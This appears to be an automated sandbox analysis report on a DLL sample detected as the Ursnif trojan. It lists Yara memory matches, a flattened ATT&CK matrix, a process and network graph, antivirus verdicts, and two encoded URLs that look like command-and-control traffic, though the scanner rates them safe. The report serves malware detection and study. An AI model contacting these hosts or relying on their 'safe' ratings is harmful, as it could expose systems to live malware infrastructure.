                      Source: loaddll32.exe, 00000000.00000002.647599368.0000000001100000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.650368021.0000000003110000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.650410553.0000000003460000.00000002.00020000.sdmp, rundll32.exe, 0000001F.00000002.651017968.00000000032A0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000002.647599368.0000000001100000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.650368021.0000000003110000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.650410553.0000000003460000.00000002.00020000.sdmp, rundll32.exe, 0000001F.00000002.651017968.00000000032A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000002.647599368.0000000001100000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.650368021.0000000003110000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.650410553.0000000003460000.00000002.00020000.sdmp, rundll32.exe, 0000001F.00000002.651017968.00000000032A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00EC269C cpuid 0_2_00EC269C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0040102F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_0040102F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401850
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00EC269C RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_00EC269C

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 572, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5852, type: MEMORYSTR
                      Source: Yara matchFile source: 12.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.d50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.4420000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.c70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.34b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.rundll32.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.420703816.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.429260721.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.446457237.0000000002FF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.458755671.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.413264520.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 572, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5852, type: MEMORYSTR
                      Source: Yara matchFile source: 12.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.d50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.4420000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.c70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.34b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.rundll32.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.420703816.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.429260721.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.446457237.0000000002FF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.458755671.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.413264520.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API2Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 481107 Sample: qT9Qk5aKTk.dll Startdate: 10/09/2021 Architecture: WINDOWS Score: 96 32 13.225.29.132, 49910, 49911, 80 AMAZON-02US United States 2->32 34 ocsp.sca1b.amazontrust.com 13.225.29.199, 49902, 49903, 49954 AMAZON-02US United States 2->34 36 192.168.2.1 unknown unknown 2->36 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Antivirus / Scanner detection for submitted sample 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 2 other signatures 2->54 8 loaddll32.exe 1 2->8         started        signatures3 process4 signatures5 60 Writes or reads registry keys via WMI 8->60 62 Writes registry values via WMI 8->62 11 cmd.exe 1 8->11         started        13 regsvr32.exe 8->13         started        16 iexplore.exe 1 101 8->16         started        18 15 other processes 8->18 process6 signatures7 20 rundll32.exe 11->20         started        64 Writes or reads registry keys via WMI 13->64 66 Writes registry values via WMI 13->66 23 iexplore.exe 16->23         started        26 iexplore.exe 16->26         started        28 iexplore.exe 16->28         started        30 iexplore.exe 16->30         started        process8 dnsIp9 56 Found stalling execution ending in API Sleep call 20->56 58 Writes registry values via WMI 20->58 38 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49816, 49817 FASTLYUS United States 23->38 40 geolocation.onetrust.com 104.20.185.68, 443, 49767, 49768 CLOUDFLARENETUS United States 23->40 46 9 other IPs or domains 23->46 42 13.225.29.204, 49968, 49969, 80 AMAZON-02US United States 26->42 44 ocsp.sca1b.amazontrust.com 26->44 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      qT9Qk5aKTk.dll81%VirustotalBrowse
                      qT9Qk5aKTk.dll59%MetadefenderBrowse
                      qT9Qk5aKTk.dll82%ReversingLabsWin32.Trojan.Ursnif
                      qT9Qk5aKTk.dll100%AviraTR/AD.Ursnif.urvkx

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.2.loaddll32.exe.ec0000.2.unpack100%AviraHEUR/AGEN.1108168Download File
                      3.2.rundll32.exe.2f30000.2.unpack100%AviraHEUR/AGEN.1108168Download File
                      0.2.loaddll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      31.2.rundll32.exe.46b0000.2.unpack100%AviraHEUR/AGEN.1108168Download File
                      10.2.rundll32.exe.4b30000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      2.2.regsvr32.exe.5e0000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      17.2.rundll32.exe.4f40000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      33.2.rundll32.exe.e80000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      2.2.regsvr32.exe.c80000.2.unpack100%AviraHEUR/AGEN.1108168Download File
                      29.2.rundll32.exe.52d0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      3.2.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      31.2.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      12.2.rundll32.exe.5470000.1.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ocsp.sca1b.amazontrust.com/images/SYju0gEPY/daXUIALH6wAr_2FEeL7Y/6GIgSGWYRYPOXzpvhXM/3guBTTFjN4dorGgaYOMkm4/M_2Bjjmvlz4ur/UEsZa_2B/wtLFrALI7COJAH4Q2eJxA3E/X6kgoUtw4W/_2FEmmXCN8gAZkdpR/hFpN7ViLd8Sb/HUuTC1Ynxdq/BFB70oLC0oipHY/frptiWELKhVA4yo7R_2Bx/tVP.avi0%Avira URL Cloudsafe
                      http://ocsp.sca1b.amazontrust.com/images/nGZ4P_2FwoiJjdC/WbaZyFGl8u4o5V_2Bt/3MW1dlOE3/XNAi9tLxJCuE0YPRtZlT/uSBAv7K7l3rJyZ38tNQ/bWQ8urEO340TOAzpTLrfn1/g6N8UXuxX3Z6B/2PtIG78y/5FZLGxch4duFejHp2UCYdv6/DXApgqy328/SmC86X3WgjhyNBdkg/98vDKpf2NWlj/jd6j019UoWb/RKR_2BwuTm2z0Lvh4aKdTS/q.avi0%Avira URL Cloudsafe
